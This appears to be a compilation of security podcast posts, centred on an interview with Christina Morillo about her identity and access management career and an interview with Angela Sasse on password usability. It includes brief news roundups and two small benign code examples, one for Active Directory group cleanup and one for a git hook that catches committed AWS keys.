I presented two practical scenarios. The first prompt: explain why you might need UBA, even if you already have a SIEM tool. The other: explain the importance of keeping the health data generated by a wearable safe and secure.
Articles discussed in our podcast:
As sleep and busyness gain prominence as status symbols, I wondered when or if good security would ever achieve the same notoriety. Investing in promising security technology is a good start. We’ve also seen an upsurge in biometrics as a form of authentication. And let’s not forget our high school cybersecurity champs!
However, as we celebrate new technologies, sometimes we remain at a loss over vulnerabilities in existing technologies, such as the ability to guess a user’s PIN using the phone’s sensors. I’m also alarmed by how easily you can order an attack!
If you want to be an infosec guru, there are no shortcuts to the top. And enterprise information security expert, Christina Morillo knows exactly what that means.
When she worked at the help desk, she explained technical jargon to non-technical users. As a system administrator, Christina organized and managed AD, met compliance regulations, and completed entitlement reviews. Also, as a security architect, she developed a comprehensive enterprise information security program. And if you need someone to successfully manage an organization’s risk, Christina can do that as well.
In our interview, Christina Morillo revealed the technical certificates that helped jumpstart her infosec career, described work highlights, and shared her efforts in bringing a more accurate representation of women of color in tech through stock images.
Cindy Ng: So, you've been in the security space for almost 20 years, and you've seen the field transform into something that people didn't really know about. Into something that people see almost regularly on the front page news. And I wanted to go back in time and for you to tell us how you got started in the security business.
Christina Morillo: So, I actually got started in the technology industry about 18 years ago, and out of that, I've been in security for about 11 to 12 years. But I pretty much got started from the ground up while I was attending university. I actually got a job doing technical support for, at the time, Compaq computers. So I'm aging myself right there. But back when Compaq computers were really popular, I worked for a call center, and we did 24-hour technical support. That's where I learned all of my troubleshooting skills: being able to walk someone through restarting their computer, installing an update, installing a patch, being able to articulate technical jargon in a nontechnical format. From there, I moved on to doing more desktop support. I wanted to get away from the call center environment and be in an enterprise environment where I was the support person, so I could get that user interaction. So that's where my journey started. It feels like yesterday, but it's been a long time.
Cindy Ng: It goes by quickly. And how did you get started at Swiss Re?
Christina Morillo: When I came back home from university, I'm originally from New York City, I was looking for work. And I really wanted to get into financial services, doing IT within the financial services industry, because I knew that would be a good strategic move for my professional career. I bumped into this recruiter, and he told me about a position at Swiss Re within their capital management investment division. So I gave it a go even though I didn't have the experience. You know, I took a shot. And they really liked the fact that I had prior experience with Active Directory and networking. I was very much hands-on and had just taken some Microsoft certifications, so I was really into it and was able to answer the questions really efficiently. They liked me, so they gave me the shot. That's what started me in the world of information security, and identity and access management, and access control. I learned all my "manual foundation," I'll call it, my manual fundamentals, at Swiss Re.
Cindy Ng: Would you say that your deep understanding of AD was an important part of your career?
Christina Morillo: Oh, absolutely. Absolutely.
Cindy Ng: And what do most sysadmins get wrong when it comes to their understanding of AD?
Christina Morillo: A lot of it has to do with the whole permissioning and file structure. A lot of times people don't really go into the differences between share permissions and NTFS permissions. And it can get really complex really fast. Especially when you're learning in school, you create your own environment, right? So it's very clean. But when you start at a company, you're looking at years of buildup. So you go into these environments that are nowhere near what you learned at school, and you're just like, oh my goodness. It becomes really overwhelming very quickly. I think it's not having that deep understanding and deep knowledge, and kind of taking shortcuts. Because we're very busy during the day, and there's a lot to do, right? Especially for sysadmins, they have a lot on their plates. So a lot of times it's like, okay, just throw them in whatever group, we'll fix it later. And later never comes. I don't fault them, but I just think that we need to be a little bit more diligent about understanding structures and fundamentals.
Cindy Ng: How did you spend time figuring out how to restructure a certain group, if that was an important part of your job or your team's?
Christina Morillo: Yeah. Of course, absolutely. I always want to because it makes my life easier. But, you know, you're not always able to. And that's because, like I said, it's so complex, and there's so many layers that peeling these layers back will cause chaos. So sometimes you have to prioritize. And just from like a business perspective you have to prioritize. You know, is this something that we can do gradually or look at setting up as a project and completing it in phases, or is it high-priority, right?
And so, the first thing I do is talk to whoever owns the group, or let's say whatever specific department, like finance. Who approved access to this group? I like to kind of determine that and then work my way backwards. So, okay, if this is the owner of the group, then I like to ask, "Who should get access to this group? What kind of access do they need? Do they need read-only access, or do they need modify access?" And then go from there. And who should be the initial members of the group? And a lot of times it's a matter of having to recreate the group. So create a fresh group, add the individual users, read-write or modify, or read-only, and then migrate them into the group, and then delete the old group. That part can take time because you don't know what you're touching.
A lot of times people like to permission groups at different levels where they don't belong. The worst thing that can happen is you cause an outage, and you never really want that. So it's about investigating, and using tools like DatAdvantage to help with those investigations, to better understand what you're doing before you do it. So it's a process. I mean, I wouldn't say it's easy. That's why, a lot of times, it's put on the back burner. But, you know, I feel like it's something that has to be done.
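As a rough sketch of the "create a fresh group, add approved members, migrate, then retire the old group" workflow described above, here is a hypothetical example using the Python ldap3 library against Active Directory. Every name in it (the domain controller, service account, OU, group, and user) is invented for illustration, and in practice you would re-point the folder ACLs at the new group and verify access before deleting the old one.

from ldap3 import Server, Connection, MODIFY_ADD

# All names below are hypothetical
server = Server("ldaps://dc01.example.com")
conn = Connection(server, user="EXAMPLE\\svc-iam", password="***", auto_bind=True)

new_group_dn = "CN=Finance-Share-RO,OU=Groups,DC=example,DC=com"
old_group_dn = "CN=Finance-Legacy,OU=Groups,DC=example,DC=com"
members = ["CN=Jane Doe,OU=Users,DC=example,DC=com"]

# 1. Create a fresh, clearly named security group (read-only in this example)
conn.add(new_group_dn, ["top", "group"],
         {"sAMAccountName": "Finance-Share-RO", "groupType": -2147483646})

# 2. Add only the users the group owner has approved
for user_dn in members:
    conn.modify(new_group_dn, {"member": [(MODIFY_ADD, [user_dn])]})

# 3. Once the folder ACLs reference the new group and nothing breaks, retire the old one
conn.delete(old_group_dn)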
Cindy Ng: Your next role, which was at AllianceBernstein?
Christina Morillo: So AllianceBernstein, that was a short-term contract. That was part of their incident response and security team. 50% of the time I was handling tickets, and, you know, approving FTP access, and approving firewall access, and checking scans or anti-virus scans, and making sure that our AV was up to date, and doing all that stuff.
And then the other 50% was working on identity management and, like, onboarding applications into the system and testing. And then training the team that would handle day to day support. So it's like a level two, level three. And then defining the processes. You know, onboarding the applications, defining the processes, writing the documentation, and then handing over to the support team to take over from there. So it was a lot of conversation with stakeholders, application owners, and I really appreciated being able to be a part of those processes.
That's why I started seeing more of the automation. I mean, at Swiss Re, we were very much manual for the first couple of years. Which was fantastic because, you know, although it was a pain, it was fantastic because I got to understand how to do things if the system was down. It gave me that understanding of like 'Oh, I know how to generate a manual report.' So when it came time to automate, I was like, 'Oh. Okay, this is nothing. I understand the workflow,' right? I can create a workflow quickly, or I can... I understand what we need, right? And it also helps when people are just like, "That's gonna take four days." I'm like, "Absolutely not. That's going to take you 45 minutes." So it was a great experience.
Cindy Ng: Would you ever buffer in time if systems went down? I'm thinking about something like ransomware.
Christina Morillo: Thankfully, that never happened while I was at these companies. And since it didn't hit my team, I think I've always been more on the preventative rather than the reactive side. A lot of times you did have to react to different situations or work in tandem with other teams, but I'm really into prevention. Like, how can we minimize risk? How can we prevent this from happening? Kind of thinking out of the box that way. You can't be an optimistic person. Like, you have to be like, well, this can happen if we leave that open. Right? And it's not even meant to sound negative, but it's almost like you have to have that approach because you have to understand adversaries and hackers: how do they think? What would I want to do? Right? Like, if I see a door unlocked. It's almost like you're on the edge and you have to think that way, and you have to look at problems a little bit differently because, in business, people don't think that way; they just want to do their work.
Cindy Ng: Did you develop that skill naturally, or was it innate, or did you realize, 'Oh my God, I need to start thinking a certain way'? The business isn't gonna care about it. That's why you're responsible for it.
Christina Morillo: I think I've always had that skill set, but I developed it more throughout my career. Like, I added strength to that skill throughout my career. Because when you're starting out, especially with network administration and sysadmin stuff, you have to be the problem solver. So you have to be on the lookout for problems. Because that's, like, your job, right? So there's a problem, you fix it. There's a problem, you fix it. So, a lot of times, just to make your job a little bit easier, you almost have to anticipate a problem. You have to say, 'Oh, if that window's open and it rains, the water's gonna get in. So let's close the window before it rains!' It sounds intuitive, but a lot of times people just don't think that far ahead.
I think it's just a matter of the longer I remain in the industry, the more I see things changing. And then you just have to evolve. So you always have to think about being one or two steps ahead, when you can. And I think that skill set comes with time. You just have to prepare. And also, like, the more you know... Like, I'm very big on education and training and learning even if it's not specific to my job. I feel like it helps broaden my perspective. And it helps me with whatever work I'm doing. I'm always taking either, like, a JavaScript class or some class, or just, like, a fun web development class. I've been looking for a Python class. Like, I did a technical cert boot camp. Like, I'm preparing for a cert. But it's a lot. But I also take ad-hoc stuff. Like I'll take a calligraphy class, just to kind of balance it out. You know, I'll go to different talks at the 92nd Street Y. Whether it's technology related or, like, futurism related, or innovation related. Or something completely different.
Cindy Ng: I've read your harrowing story about taking a class at General Assembly while having kids and a husband. Oh my God, you are so amazing. It's so inspiring.
Christina Morillo: Definitely hard. But, you know, you gotta do what you gotta do. And the thing is, when you become a parent, it doesn't mean that you lose your ambition. It just kind of goes on a temporary hold. But then, when you remember, you're like, 'Oh, wait a minute. No. I have to get back to it.'
Cindy Ng: So let's talk about Fitch Ratings. That role is really interesting.
Christina Morillo: Yeah, yeah. Thus far, it's been one of my favorites. Because, at Fitch, I was actually able to deploy an identity and access management platform. So, from nothing, to create something completely new and just deploy it globally, right? So what that means is that I changed the HR onboarding process and offboarding process. So, like, how new hires are added to the system. How people that are terminated are removed from the system. How employees request access to different applications. How managers approve. How authorizers approve the entire workflow. So that was amazing.
Basically, when I started, they wanted to go from a pretty decentralized to a centralized model and to purchase this out-of-the-box application. They had a lot of transitions, so they needed someone to come in and own the application and say, like, "Okay, let me implement it." It was just on, like, a development server, not fully configured. So, my job was to come in, look at the use cases, look at what they needed. At least initially. What needed to happen? How did they need to use this application? Then I needed to understand the business processes. The current state: how do they perform this work today? Like, does the help desk do it? Does a developer give access to a specific application that they manage? What are they developed for? What happens now?
So I took time to understand all of the processes. Right? Like, I spoke to everyone. I spoke to HR. I spoke to finance. I spoke to legal. I spoke to compliance. I spoke to the help desk. I spoke to network administration. I spoke to application developers. I compiled all of that information in order to better create the use cases and the workflows, and to kind of flesh them out. Then what I did is I started building and automating these processes in that tool, on that platform.
My boss gave me... He said, "Oh, I'll give you like a year." And I was like, "Okay. Fine." But, I guess, once I got into the thick of things, I got really aggressive, and I was really hard on the vendor. Because I was a team of one. You know, I had support from our internal app team, and the network administration team, and the sysadmins. But I completely owned the process, and owned the application, and owned building it out. So I rode the vendor like crazy just to get this done, and understand it, and just to look at it from top-to-bottom, bottom-to-top. And we were able to deploy it in five months.
You know, I got them from sending emails and creating help desk tickets to a fully automated system for onboarding, offboarding, and requesting entitlements. But more importantly, I was able to get people on board. Because that's one of the other big things that you don't really discuss. A lot of times we got a lot of pushback. While what we do is extremely important, especially in security, sometimes we're not the ones who are the most liked. People are afraid, right? So it's also about developing new relationships with your constituents, with the users, right? And helping them understand that you're not trying to make their lives miserable, you're just getting them on board. I think that also takes skill. It takes finesse. It takes being able to speak to people, relate to people. And also, it takes being able to listen at scale. Right? So you have to listen to understand.
You know, I think if a lot of us did more listening and less talking, we would definitely understand where people are coming from and be able to kind of come up with solutions. I mean, you're not always gonna make people happy. Maybe some of the time. Not all of the time. But at least you've communicated, and they can respect you for that. Right? So I was able to get pretty much the entire company on board. And to welcome this tool that they had heard about for so long. And they weren't hesitant. To the point where I couldn't get them to leave me alone about it.
Cindy Ng: You were able to help them realize that they're still able to do their work, but do it securely.
Christina Morillo: And better.
Cindy Ng: When you say scared and concerned, what were they worried about?
Christina Morillo: When you say the word "automation," the main worry is that people are gonna lose their jobs. When someone says, "Oh, I heard that the tool will allow you to onboard a user," people won't need to call the help desk anymore for that, or won't need help with that. Then you're taking away a piece or a portion of their work, which may affect their productivity. And if it affects their productivity, it will affect the money that the team or the department gets. If that happens, then, obviously, we don't need ten help desk people. We only need five. Right?
So, pretty much, it's the fear of losing their jobs or fear that they're becoming obsolete. That's usually the biggest one. And also, when there's, like, a new person coming in asking you how you do your work and what the process is, that's kind of scary. "Why do you want to know? Are you taking over? Are you trying to take away my work?" You're always going to get pushback. I think that's part of the job, especially when you're in security. You're just always going to. And, you know, people fear what they don't understand. So that's part of it too.
Cindy Ng: Let's talk about Morgan Stanley now. So at this point, you're at a more strategic level, where you're really helping entire teams manage risk?
Christina Morillo: Yeah. So while I was at Fitch and, you know, while I loved it, it became more of a sysadmin type of role. So I decided to begin looking for my next opportunity. And Morgan Stanley came up that summer. And I looked at it as a great opportunity for me to be at a more strategic level and become a middleman, right? Almost like a business analyst, where I'm understanding what the business needs and kind of liaising on the technology side. So I thought it would be a good opportunity for me to hone that skill set on the business side and look at value propositions. But also, because of my technical background, I'd be able to communicate with and get things done on the tech side.
So that was amazing. I mean, I learned a lot about how the business and IT engage. What's important, and how to present certain, I guess, calls to action. Like, if you need something done, like, oh, you're implementing a new DLP solution. Are you solving a problem for the business or are you solving a problem for technology? Understanding the goal. Understanding your approach. And looking at things two ways. Looking at how to resolve a problem tactically: how can we resolve this issue today? And then, what is the strategic or long-term solution? So a lot of business-speak, a lot of how to present.
I think I would almost equate it to... My time at Morgan Stanley... And I'm no longer at Morgan Stanley, actually. But my time at Morgan Stanley I equated to getting a mini-MBA because it really prepared me and allowed me to think differently. I think, you know, when you're in technology you tend to stay in your tech cocoon. And that's all you want to do and talk about. But understanding how others think about it, even how project managers engage with a business. The business is just thinking about risk, and how to minimize risk, and how they can do their jobs and make money. Because, at the end of the day, that's what the goal is, right? Yeah, it allowed me to understand that. Whereas normally, on the tech side, I never really had to deal with that or face it. So I didn't think about it. But at Morgan, you have to think about it, and you have to create solutions around it.
Cindy Ng: Also, IT's often seen as a cost center rather than a money generator.
Christina Morillo: I've always had an issue with that. Even though IT, like, we're seen as a cost center, without us... And I'm biased, obviously... But I feel like without us, you wouldn't be able to function. At the end of the day, are we generating money? I think so. But then it goes into that whole chicken-or-the-egg thing. But that's my argument, and I guess I'm biased. I've always been in IT, right?
Cindy Ng: What's most important to the business? Is it always about the bottom line? For IT people, it's always about security and minimizing risk.
Christina Morillo: It is about the bottom line. There are many avenues to get there more efficiently, or just a little bit smarter. It's like working smarter. But I think one of the ways is by listening at scale. Just like if you're starting a company and you're providing a service, you need to understand who your target market is, right? You need to understand what they want and why they want it. And that's how you know what service you can provide or how you can tailor your offering to them. Why? Because then they will buy it from you, or they will seek services from you. And what does that mean? That means you get to collect that money.
And sometimes you need, like, a neutral group. You know? Like a working group. I realized they have a lot of working groups. So a lot of discussion. Sometimes that can be good and bad, but I see it as more of a positive thing. And the reason why is because you need to be able to hear from both sides, right? Both sides need to be able to express themselves, and everyone needs to be on the same page or get to that same page somehow. You need to understand what I need as a business user. I need to be able to book a trade, or I need to be able to do this, and I need to do it in this amount of time. Now how can you help me? And then the IT person, or the security person, whoever, needs to be able to say, "Okay. Well, this is what I can do, and this is what I cannot do right now. But maybe this is what I can do in the future."
Again, it goes back to that we are problem solvers. So we're all about solutions and how to keep the business afloat and keep the business running and operating. That's our job. We're not there to say we have to do it this way. That's not what we're there for. So I think it's also understanding what role everyone plays, and understanding that we all have to kind of like work together to get to that common goal.
Let's say we have a working group about implementing Varonis DataPrivilege globally, right? So then you have stakeholders from every department, or every department that it would touch. So if that means the security team is going to be involved, we have a representative from the security team. If that means the project manager who's managing the project is gonna be involved, we have someone from that team. So you pretty much have a representative from each team that it will affect. Including the business, at times, so that they're aware of what's going on. And then you have status updates on what's going on. What do we need? Where are the blocks and the blockers? And people get to speak, and people get to brainstorm, and you get to bring up problems, and what you need from the other team, and what they need from you. And it just helps with getting projects moving and getting things going quickly and more efficiently, without anyone feeling like they weren't represented in the decision-making process. It speaks to that as well.
Cindy Ng: Before our initial conversation, I had no idea that you used DatAdvantage.
Christina Morillo: My last employer, they used DatAdvantage, and they were also implementing portions of DataPrivilege. The company before that, Fitch, we used DatAdvantage heavily. So, like, reporting. You know, it's been a couple of years, so I don't know if they still use the tool. But I know when I was there, I actually used it for reporting purposes, to help me generate reports, and to do, like, investigations, and other rule-based stuff.
Cindy Ng: Was it helpful for, like, SOX compliance?
Christina Morillo: Yeah. Yeah, whether it was internal or external audits, we always got the call. Like, "Can you tell me who had access to this group on such and such date?" or, "Can you show me when this was removed?" or, "Can you tell me this?" Just odd ad-hoc requests. They make sense, right? But at the time, you're like, 'Why do you need this?' Being able to quickly generate the report was, like, super helpful.
Cindy Ng: And finally, I love what you do with the Women of Color in Tech chat.
Christina Morillo: Yeah, yeah. A friend of mine, Stephanie Morillo...no relation, just the same last name...but we both work in tech. And in 2015, we decided to co-found a grassroots initiative to help other women of color, non-binary folks, and just under-represented people in technology have a voice, a community. We started off as Twitter chats. So we would have weekly, bi-weekly Twitter chats. Just having conversations with the community.
And then we started getting contacted by different organizations. They wanted to sponsor some of our community members to attend conferences, and just different discussions and meetups and events. So we started to do that. We also did, like, a monthly job newsletter, where companies like Twitter and Google contacted us. Then we worked with them: we posted the different positions they were recruiting for and shared them directly with our community.
And then, the thing we're most known for is the Women of Color in Tech stock photos, which basically is a collection of open-source stock photos featuring women and non-binary folks of color who work in technology. The goal was to give those photos out for free, open-source them, so people can have better imagery, right? Because we felt that representation mattered. The way that came about was when I was building the landing page for the initiative, I realized that I couldn't find any photos of women like me who work in technology. And it made me really upset. Right? And so that activated... I feel like that anger activated something within me, and maybe it came out as a rant. Like, I was just, like, "Okay, Getty, don't you have photos of women in tech who look like me?" Because every time I saw a woman with a computer or an iPad, whether white or Asian or whoever, it looked like she was just playing around with it. Those are the pictures that I was seeing. This is not what I do. This is not what I've done. So I just felt like I wasn't represented. And if I wasn't represented, countless other folks weren't either.
I spoke to a photographer friend of mine who also works in tech. And this is like his side passion. So he agreed, and we just kind of started out. I mean, we went with the flow. It turned out amazing. And we released the photos. We open-sourced them, and we got a lot of interest, a lot of feedback, a lot of features, a lot of reporting on it. And we decided to go for another two rounds. You know, a lot of companies we talked to were like, "We want to be a part of this. This is amazing. How can we support you?" So a lot of great organizations. If you look at the site, you see the organizations that sponsored the last two photo shoots.
We released a collection of over 500 photos. And we've seen them everywhere, from Forbes to the Wall Street Journal. They're just, like, all over the web. Some of our tech models have gotten jobs because the photos started conversations. Like, "Wait, weren't you in the Women of Color in Tech photos?" "Yeah, that's me!" Some people have gotten stopped, like, "Wait a minute, you're in this photo." Or they get tagged. They've been used at conferences. Some organizations are now using them as part of their landing pages. They're all over the place. And that was the goal.
But it really, you know, makes us really happy. But just seeing photos all over the place, and the fact that people recognize that those are our photos, it was just amazing. We actually open sourced our process as well. We released an article that spoke about how we got sponsors, what we did, in hopes that other people, other organizations would also get inspired and replicate the stock photos. But we also get inquiries about, you know, "Are you gonna have another one? Can you guys have another one?" So it's up in the air. I'm debating it. Maybe.
It was only last week that we applauded banks for introducing cardless ATMs in an effort to curb financial fraud. But with the latest bank heists, it may help to turn up both the offense and the defense. Why? Hackers were able to drill a hole, connect a wire, cover it up with a sticker, and the ATM would automatically and obediently dispense money. Another group of enterprising hackers changed a bank's DNS, taking over its website and mobile sites and redirecting customers to phishing sites.
But let's be honest and realistic. Bank security is no easy feat. Banks are complicated systems with a large attack surface to defend, whereas attackers only need to find one vulnerability, sprinkle it with technical expertise, and they get to decide when and how the attack happens. Moreover, they don't have to worry about bureaucracy, meeting compliance requirements, or following laws. The bottom line is that attackers have more flexibility and are more agile.
In addition to evolving bank security threats, we also covered the following:
Recently, the Pew Research Center released a report highlighting what Americans know about cybersecurity. The intent of the survey and quiz was to understand how closely Americans are following best practices recommended by cybersecurity experts.
One question on the quiz reminded us that we’re entitled to one free copy of our credit report every 12 months from each of the three nationwide credit reporting companies. The reason behind this offering is that there is so much financial fraud.
And in an effort to curb banking scams, Wells Fargo introduced cardless ATMs, where customers can log into their app to request an eight-digit code to enter along with their PIN to retrieve cash.
Outside the US, the £1 coin gets a new look and line of defense. It uses an Integrated Secure Identification System, which can be authenticated at high speed with industry-leading automated detection levels. Plus, it's harder to counterfeit, and that's exactly what we want!
Other themes and ideas we covered that weren’t part of the quiz:
Did the Inside Out Security panel – Cindy Ng, Mike Thompson, Kilian Englert, and Mike Buckbee – pass Pew's cybersecurity quiz? Listen to find out!
Besides talking to my favorite security experts on the podcast, I've also been curious about what CISOs have been up to lately. After all, they have the difficult job of keeping an organization's network and data safe and secure. Plus, they tend to always be a few steps ahead in their thinking and planning.
After a few clicks on Twitter, I found a CISO at a predictive analytics SaaS platform who published a security manifesto. His goal was to build security awareness into every job, every role, and to give people a reason to choose the more secure path.
Another CSO at a team communication and collaboration tool company stressed the importance of transparency. This means communicating with their customers as much as possible - what he’s working on and how their bug bounty and features work.
As for what CISOs are reading and sharing, here are a few links to keep you on your toes and us talkin’:
Over the past few weeks, we've been debating a user's threshold for having their personal data visible in the public domain. For instance, did you know that housing information has always been public information? It is gathered from county records, and the internet has just made the process of gathering it less cumbersome. However, if our personal information leaks into the public domain – due to a security lapse – it's still not as serious as, say, a breach of 2 million records. The point is that many security experts will remind us that there is no perfect security, as lapses and breaches will happen.
Meanwhile, I bemoan that no data should be left behind (all data should be protected!) and discuss my concerns with this week's Inside Out Security Show panel – Cindy Ng, Mike Buckbee, Kilian Englert and Forrest Temple.
Additional articles we discussed:
In our "always-on" society, it's important that our conversation on IoT security continues with the question of data ownership.
It made its way back into the limelight when Amazon, with the defendant's permission, handed over user data in a trial.
Or what about new software that captures all the angles of your face to build your security profile? Your face is such an intimate aspect of who you are; should we reduce that intimacy down to a data point?
I discussed these questions with this week’s Inside Out Security Show panel – Cindy Ng, Forrest Temple, Kilian Englert and Mike Buckbee.
Additional articles we discussed:
As more physical devices connect to the internet, I wondered about the responsibility IoT manufacturers have in building strong security systems within devices they create. There’s nothing like a lapse in security that could potentially halt the growth of a business or bring more cybersecurity awareness to a board.
I discussed these matters with this week’s Inside Out Security Show panel – Cindy Ng, Forrest Temple, Kilian Englert and Mike Buckbee.
First in line to be discussed was the shocking revelation that while car manufacturers enabled users to control their vehicles with an app, they never thought through what happens when it’s sold. What’s the harm? In the words of the car owner, “If I were a criminal, I could’ve stolen the car.”
In another alarming article, a security researcher recently discovered that anyone can connect to and control a cuddly CloudPets toy via Bluetooth, recording private conversations with the built-in microphone. If you're a parent who finds this IoT toy a cute way to leave messages with your child, your privacy may be at stake.
Additional recent news articles we discussed include:
I recently came across an article that gave me pause, “Why Data Breaches Don’t Hurt Stock Prices.” If that’s the case and if a breach doesn’t impact the sale of a company, does security matter?
So I asked the Inside Out Security Panel – Cindy Ng, Forrest Temple, Mike Buckbee and Kilian Englert.
They gently reminded me that there’s more than just the stock price to look at – brand, trust, as well as pending lawsuits.
In addition to these worries, proper breach notification is becoming a bigger responsibility. Is there a good or bad way to notify others about a breach? We discussed a controversial way a vendor disclosed their breach as well as some of the top stories of the week:
The debate between users volunteering their data for better service versus being perceived as a creepy company that covertly gathers user data remains a hot topic for the Inside Out Security panel – Cindy Ng, Kris Keyser, Mike Buckbee, and Kilian Englert.
There were two recent stories that triggered this debate. Recently, a smart television manufacturer agreed to pay a $2.2 million fine to the Federal Trade Commission for "collecting viewing data on 11 million consumer TVs without the consumer's knowledge or consent." Is that creepy, or could the argument be made that viewing data only helps with the overall user experience?
Contrast the aforementioned story with one where psychologists and data scientists can measure a user's voluntary Facebook likes to diagnose a personality type. This is known as psychometrics and is measured using a model often referred to as OCEAN: openness (how open are you to new experiences?), conscientiousness (how much of a perfectionist are you?), extroversion (how sociable are you?), agreeableness (how considerate and cooperative are you?), and neuroticism (are you easily upset?). With your personality type identified, marketers believe it can be used to influence your future purchasing decisions or your vote in a presidential election.
The panelists had vastly different views on acceptable and unacceptable behaviors.
Tool of the week: Git pre-commit hook to search for Amazon AWS API keys.
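As a generic illustration of the idea (not the specific hook mentioned on the show), a pre-commit hook is just an executable script at .git/hooks/pre-commit whose non-zero exit code blocks the commit. A minimal Python version that scans staged additions for strings shaped like AWS access key IDs might look like this:

#!/usr/bin/env python3
import re
import subprocess
import sys

# AWS access key IDs look like "AKIA" followed by 16 uppercase letters/digits
AWS_KEY_ID = re.compile(r"\bAKIA[0-9A-Z]{16}\b")

# Scan only the lines being added in this commit
diff = subprocess.run(
    ["git", "diff", "--cached", "-U0"],
    capture_output=True, text=True, check=True,
).stdout

hits = [line for line in diff.splitlines()
        if line.startswith("+") and AWS_KEY_ID.search(line)]

if hits:
    print("Refusing to commit: possible AWS access key in staged changes.")
    for line in hits:
        print("  " + line)
    sys.exit(1)  # a non-zero exit code aborts the commit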
Other stories covered in this podcast:
In part two of my interview with Angela Sasse, Professor of Human-Centred Technology, she shared an engagement she had with British Telecom (BT).
The accountants at BT said that users were resetting passwords at a rate that overwhelmed the help desk's resources, making the cost untenable. The security team believed that the employees were the problem; Sasse and her team thought otherwise. She likened the problem of requiring users to remember their passwords to asking them to perform memory exercises. And with Sasse's help, they worked together to change the security policy so that it worked for both the company and the user.
We also covered the complexities of choosing the right form of authentication (i.e. passwords, 2FA or biometrics?), the pros and cons of user training, and the importance of listening to your users.
Angela Sasse: You know, when we originally published "Users Are Not the Enemy," we didn't say where it was...this first study was done at British Telecom, but they subsequently did out themselves as the organization. And they actually approached me originally, because they knew they had a problem, but the security people hadn't realized it. They thought the employees were the problem. They were getting heat from the accountants over the cost of running the password reset desks because their employees couldn't cope with the passwords. There was an awful lot of resets going on.
And those help desks got bigger and bigger, you know, both the internal ones and also the ones they were running for some of the services, you know, for the internet services they were running. And the accountants basically said, "The help desks have reached this size now, and this is untenable." You know, I mean, first of all, they can't grow anymore, and in the long run you've got to look to reducing this. You know, the cost is just untenable.
And so they originally said, "Oh, it's people's fault they can't remember their passwords," whereas once we did the study, I said to them, "No, you're asking them to do memory exercises, to perform feats of memory that humans just can't do." And so, to me, actually, at this time, so this was in the late '90s, you know, it was clear to me that single sign-on...that they really needed to look to bring a lot of the different systems they had behind a single sign-on. And that took a while. So that business case took, in total, five years to put through the company and put into action.
But there was a couple of things that we worked on with them to reduce the load as much as we could without having a single sign-on mechanism. So, for instance, to get the company to standardize the user IDs, because if you've got lots of different passwords, having lots of different user IDs on top of that really doesn't help. And the next thing we did, which is something that only really has happened very recently, is to increase the lifetime of passwords, so to, basically, say, like, changing them every 30 days is ridiculous, right? You're pushing people...you know, the only way they can remember that is by either using the same password everywhere or by having very easy passwords with just numbers at the end, you know, that they keep increasing whenever they have to change it. So we basically worked with them and put...you know, basically changed the policies.
And then they also took a view that for some of the infrequently-used systems, it was okay to write them down, to write passwords down, and then securing what they were writing down. That was the process over a period of time, and I think every time they made a change, they could see it was getting slightly better until the point then when they introduced a single sign-on. And I think a lot of organizations...I also know we worked with a financial services institution at the time where they went though a similar process.
But then, of course, with outsourcing, the ability to put everything behind a single sign-on was going away. So even if you had a single sign-on for your internal systems, with all the outsourced stuff, and, you know, if you have, like, your blue book and your gym is contracted out. You know, some even contract their HR out, and all of those service providers have their own access credentials. Then employees very quickly end up with, you know, maybe half a dozen or up to ten different passwords again. So that problem got back, and I think it's just taken a long time. About 10 years ago, some organizations experimented with having biometric access to our IT systems. And that sort of, it worked for some of them, but others just found that it wasn't robust enough, and you had far too high error rates. But effectively now we've seen a shift to two-factor authentication. That means that the memory part of it isn't so onerous anymore.
So I think it really culminated, for me, when GCHQ released their password advice last year. They changed the government guidance, and that put into practice a lot of those things. We have observed, and some other research has also observed and basically advised, you know, to say that expiring passwords without good reason is counterproductive, that you really should move to two-factor authentication or another form of, you know, continuous authentication, to reduce the workload on users, and so on.
And I think, actually, that the result of that was that now the CISOs who can understand that, who engage, who listen to their employees or their customers now effectively have the backing to say, "Just because I'm making things easier to use doesn't mean my security is worse. Basically, look at this. You know, the government agency responsible for our security now says that you've got to make security usable if you want it to be effective." And so they now have the backing, and they have something to point to, to make those changes. And it's less of a taking a personal risk and sticking their neck out, if you know what I mean.
Cindy Ng: Have you heard about...I think NIST said that SMS is not a good form of two-factor authentication, because you don't know if the phone is in the actual person's hands?
Angela Sasse: Well, I mean, my view is you can...you know, you've got to really see what risks for those different things are. You know, that is only true if, A, the phone has been taken away from the person and if they have not put any form of access control on it. And that's really changed. The vast majority of phone users do protect access to their phone. They put either a PIN or a fingerprint authentication on it, right? And I think in that case it's perfectly reasonable.
Cindy Ng: And in terms of biometrics, you mentioned that it wasn't working when organizations were attempting to use biometrics as a form to authenticate. What form, their eyeball, their thumbprint?
Angela Sasse: It varies. So, I've seen thumbprint work very well in some organizations and not well in others. Iris recognition is quite widely used in some high-end, because it's a fairly expensive biometric...
Cindy Ng: Or voice?
Angela Sasse: Voice, after years of being a sort of, like, bit of a sleeping beauty, is now making great strides, you know, in banking, for telephone authentication.
Cindy Ng: How are you able to tie usability and security back to the bottom line?
Angela Sasse: That actually really is research that's happening now. Very occasionally, you find there's a very, very clear, now, business metric that will tell you how well you're doing, you know, so that when, for instance, security has an impact on customers, right? So we know, for instance, that the kind of two-factor authentication that the banks introduced here in the UK upset a lot of customers and that they changed as a result of that. And that basically really pushed the development of phone-based banking, because they thought, you know, they could actually sort of... Because, really, I think by the time they rolled out the two-factor authentication using these various card readers and things like that, it was kind of like it was already felt to be quite clunky and difficult. And they felt that they could actually make it a lot easier to use and more accessible on the phone and also more acceptable to many customers on the phone. I think that's...you know, in the financial sector we've seen those changes happening there.
Cindy Ng: Is there a final message or something that I didn't cover that you think is worth expressing?
Angela Sasse: Well, I think...so one of the things I find quite helpful when I try and get security people to understand is this whole question of how do you actually work with the end users. Because at the end of the day, I really believe this, we have to work together, you know? If we don't work together...that's the whole point of the "Users Are Not the Enemy" paper, right? If the good guys don't work together, then you're really making the attackers' job a lot easier. We need to work together, and we want to make it easy for people to do the right thing. We don't wanna get too much in the way of their activities, so we need to be very clear about what they're expected to do and things that they're expected not to do, as a way of making sure the security that we've deployed actually works.
And I think, to deflect that, one of the things I always use is the 90-10 rule. So, whilst a lot of security experts, you know, their first thought is, "Oh, can I provide some user training or some user education to make them, you know, able to use the security I've put in place?" I would actually point out that user education is for about 10% of cases. In 90% of cases, you change the technology to make it easier to use. It's only in 10% of cases that you're changing people's knowledge or changing people's behavior in order to do that. So it's something you do very occasionally. It's not the default position.
